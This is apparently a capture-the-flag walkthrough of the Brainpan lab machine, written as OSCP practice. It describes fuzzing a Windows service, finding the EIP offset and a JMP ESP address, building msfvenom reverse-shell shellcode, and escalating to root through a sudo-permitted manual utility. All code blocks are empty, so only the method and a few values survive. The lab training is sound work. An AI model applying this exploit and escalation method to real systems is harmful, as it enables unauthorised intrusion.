Vulnhub virtual machine; OSCP Buffer-Overflow prep. “Where we’re going we don’t need roads”. This box is a perfect test of skills in regards to buffer-overflows and you will work on crafting an overflow that leads to a reverse shell. The escalation of box stems from a pivot via a manual.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.
By continued reading, you acknowledge the aforementioned user risk/responsibilities.
Discover VM on network
1 |
|
target: 192.168.56.110
Enumeration
Nmap Scan
1 |
|
We have identified several interesting ports 9999 - unknow service but has this “WELCOME TO BRAINPAN” 10000 - SimpleHTTPServer with some type of base64nc
navigating to port 10000 - which lead to this image
inspecting source:
Nothing much left to look at.
Connecting to port 9999
1 |
|
we have a password field in which we can try to brute force. Nevermind it just connection refused after several attempts.
webmin
is an interesting user possibly
Continuing enumeration with dirbuster
Navigating to /bin
well an brainpan.exe
discovered - download locally to investigate.
1 |
|
PE32 executable - Looks like we’ll be doing some reverse engineering.
Reverse Engineering
Opening file with wine
1 |
|
hmm port 9999 let’s try and connect to localhost on 9999
1 |
|
we recieved a callback to the brainpan.exe
on port 9999
attemping a password of password
the word password
looks to have pushed 9 bytes to the buffer.
Load brainpan.exe
into ollydbg
Start twice to run
secondary window (popup)
application is running correctly and awaiting connections to port 9999.
Goal: is to gain control of ESP & EIP to then JMP ESP shellcode to a reverse shell.
vid- fuzz.py
1 |
|
create bfuzz.py (fuzzing application) - launch against application
1 |
|
brainpan.exe
response:
and finally a crash of program around 600 bytes.
create pattern with metasploit
1 |
|
output:
1 |
|
add to buffer skeleton file.
Buffer Skeleton File (buff-skel.py
):
1 |
|
add pattern_create string to buff-skel.py
1 |
|
now the buffer is 600 bytes of non repeating code.
execute buff-skel.py in an attempt to find exactly where application crashes.
verifying data got sent to application via olly
Application is confirm killed via Access violation when execute [35724134] -
EIP = 35724134 (highlighted in registers)
We need to find this exact offset of EIP with pattern_offset
1 |
|
Offset = 524 - the exact number of bytes required to be sent to application to cause the crash
Adjust the buff-skel.py to change to exact 524 “A”s to send to brainpan
1 |
|
we are going to want to try to fill the EIP value with something so we can determine if we’ve taken it over.
Restart application in OllyDbg
1 |
|
crash application with buff-skel.py
Application crashed.
OllyDgb
Now shows that we have replaced the registers:
EBP: 41414141 = A’s EIP: 42424242 = B’s
Follow ESP dump
1 |
|
brings us to the excution of the C’s and this will be the area where our generated shellcode will be placed.
shellcode is normally 300bytes on average.
Restart application in OllyDbg
1 |
|
Currently we have about 60bytes of space to work with and so we need to attempt to add more space to the C area by changing the 600 to 1400.
1 |
|
Run buff-skel.py
significant number of C’s and space available for the shellcode.
Keep in mind bad characters for Buffer Overflows https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/
great write up available by Georgia Weidman #hailGeorgia
Testing For Bad Characters
add badchars to buff-skel
1 |
|
run buff-skel for badchars
hex dump shows exactly after the A’s and B’s the badchars sent. If there is a gap in the sequence we can see what exact char is bad.
Note: if shell code doesn’t work its probably a badchar which is possibly stopping you.
restart ollydgb
Finding the JMP ESP
locating the jmp esp
in main
1 |
|
Results:
JMP ESP = 311712f3 - with this we know we can have our shellcode execute from here.
adjust buff-skel.py to add the JMP ESP address
1 |
|
before executing add breakpoint to ollydgb for the JMP ESP
1 |
|
which will not stop at this point when application is ran.
Execute buff-skel.py - hit breakpoint
and directs the jmp
right the C’s where our shell code will exist.
Creating Shellcode Payload
reverse shellcode via msfvenom
1 |
|
-b
= for badchar (we know \x00 is a no-go)
add shellcode to buff-skel.py
1 |
|
Setup NC Listener
1 |
|
In some cases the nc listener just doesn’t function property and thats when you need to switch to metasploits.
Setup Metasploit Listener Note: for OSCP exam you are allowed to use the metasploit multi/handler listener as much as you want.
launch metasploit (fastest way)
1 |
|
1 |
|
1 |
|
1 |
|
1 |
|
1 |
|
Priv-Esc
connection made after buffer-overflow
Upgrade to TTY
1 |
|
quick check of sudo abilities
1 |
|
application anasi_util
is able to be ran as root
1 |
|
looks to be a manual [command]
which looks like a good way to escalate.
Escalation via vi:
1 |
|
Root
enter escape sequenence !bash
Gimme the loot!
1 |
|
Bring me the root!
-exec